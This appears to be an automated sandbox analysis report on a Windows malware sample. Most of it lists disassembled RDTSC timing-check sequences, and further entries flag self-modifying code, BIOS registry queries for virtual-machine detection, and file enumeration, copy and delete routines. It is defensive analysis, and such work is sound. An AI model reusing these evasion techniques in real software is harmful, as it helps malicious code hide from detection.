                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03E5 second address: EB03EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03EE second address: EB03F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03F3 second address: EB041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F60F1137216h 0x0000000f jmp 00007F60F1137228h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB041A second address: EB041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB06AC second address: EB06B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0C43 second address: EB0C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493AFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4DFE second address: EB4E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4E02 second address: EB4E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1143A second address: E11440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB45F2 second address: EB4603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F12493A6h 0x0000000a jne 00007F60F12493A6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4603 second address: EB4608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4608 second address: EB461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F60F12493A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB461A second address: EB4638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F60F1137227h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4638 second address: EB463E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4760 second address: EB4786 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F60F113722Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4786 second address: EB478C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB478C second address: EB47A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4AA2 second address: EB4AAC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB939C second address: EB93AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F60F113721Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB969E second address: EB96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B0h 0x00000009 jmp 00007F60F12493B5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB96C7 second address: EB96FA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F1137216h 0x00000008 js 00007F60F1137216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F1137223h 0x0000001a jmp 00007F60F113721Dh 0x0000001f jmp 00007F60F113721Ch 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9854 second address: EB9860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F60F12493A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9860 second address: EB9864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9864 second address: EB9874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F60F12493ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB99BF second address: EB99CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB99CA second address: EB99CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9AE3 second address: EB9B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F1137216h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edi 0x00000012 je 00007F60F1137216h 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f js 00007F60F113721Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E688D6 second address: E688DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E688DA second address: E6891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F1137229h 0x0000000b popad 0x0000000c nop 0x0000000d add dword ptr [ebp+12465119h], esi 0x00000013 mov ebx, dword ptr [ebp+124897B8h] 0x00000019 movsx edx, bx 0x0000001c mov dword ptr [ebp+122D38A8h], ecx 0x00000022 add eax, ebx 0x00000024 mov dx, di 0x00000027 nop 0x00000028 jc 00007F60F1137224h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6891F second address: E68925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68925 second address: E68969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F60F113721Bh 0x0000000b nop 0x0000000c and edi, dword ptr [ebp+12450EDFh] 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F60F1137218h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B14h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68969 second address: E6896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6896D second address: E68973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68973 second address: E68979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9C50 second address: EB9C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F60F113721Ch 0x0000000d jbe 00007F60F1137216h 0x00000013 jo 00007F60F113721Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F60F1137224h 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0930 second address: EC093C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC093C second address: EC096D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F60F113723Fh 0x0000000e jmp 00007F60F113721Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137222h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0BEC second address: EC0BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0E76 second address: EC0E82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19C6 second address: EC19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19CC second address: EC19D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19D0 second address: EC19DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19DA second address: EC19EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F60F1137216h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6306 second address: EC6310 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6310 second address: EC6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6457 second address: EC645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6775 second address: EC6781 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F60F1137216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6781 second address: EC6787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6787 second address: EC67A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137229h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC67A4 second address: EC67CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F60F12493AEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6935 second address: EC6939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6939 second address: EC693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6A68 second address: EC6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6DAE second address: EC6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6DBA second address: EC6DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED5259 second address: ED525F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED525F second address: ED5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3248 second address: ED3254 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3254 second address: ED3265 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jg 00007F60F1137216h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3732 second address: ED3736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3736 second address: ED373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED373C second address: ED374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F12493ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED374A second address: ED3758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F60F1137216h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED38C0 second address: ED38C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED38C5 second address: ED38E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137224h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F60F1137216h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED38E6 second address: ED38FA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c je 00007F60F12493A6h 0x00000012 push edx 0x00000013 pop edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3CE0 second address: ED3CE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E88 second address: ED3E9D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B1h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3E9D second address: ED3EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F60F113721Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4006 second address: ED400C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED400C second address: ED4010 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4169 second address: ED4173 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4173 second address: ED4184 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jo 00007F60F1137216h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48E9 second address: ED48EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48EF second address: ED48F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48F3 second address: ED48F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48F7 second address: ED48FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED48FD second address: ED4919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jmp 00007F60F12493B2h 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED4919 second address: ED493A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137226h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f pop ebx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED493A second address: ED4971 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F60F12493A6h 0x00000008 je 00007F60F12493A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 jmp 00007F60F12493AFh 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F60F12493B6h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED90E7 second address: ED9103 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F1137224h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9103 second address: ED9112 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 jne 00007F60F12493A6h 0x0000000d push eax 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9112 second address: ED9116 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9116 second address: ED913C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F60F12493A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F60F12493AAh 0x00000013 jmp 00007F60F12493AEh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED913C second address: ED9142 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC182 second address: EDC1C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007F60F12493B7h 0x00000014 jl 00007F60F12493A6h 0x0000001a push eax 0x0000001b pop eax 0x0000001c ja 00007F60F12493A6h 0x00000022 popad 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDC1C2 second address: EDC1DF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F60F1137228h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE92DA second address: EE92E3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8E23 second address: EE8E27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC964 second address: EEC970 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push esi 0x00000009 pop esi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEC970 second address: EEC986 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F1137222h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E5687E instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: E67C0F instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: CB1AED instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Special instruction interceptor: First address: EDEBAA instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\file.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A638B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A64910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA
                Source: C:\Users\user\Desktop\file.exe | Code function: 1_2_00A5ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose
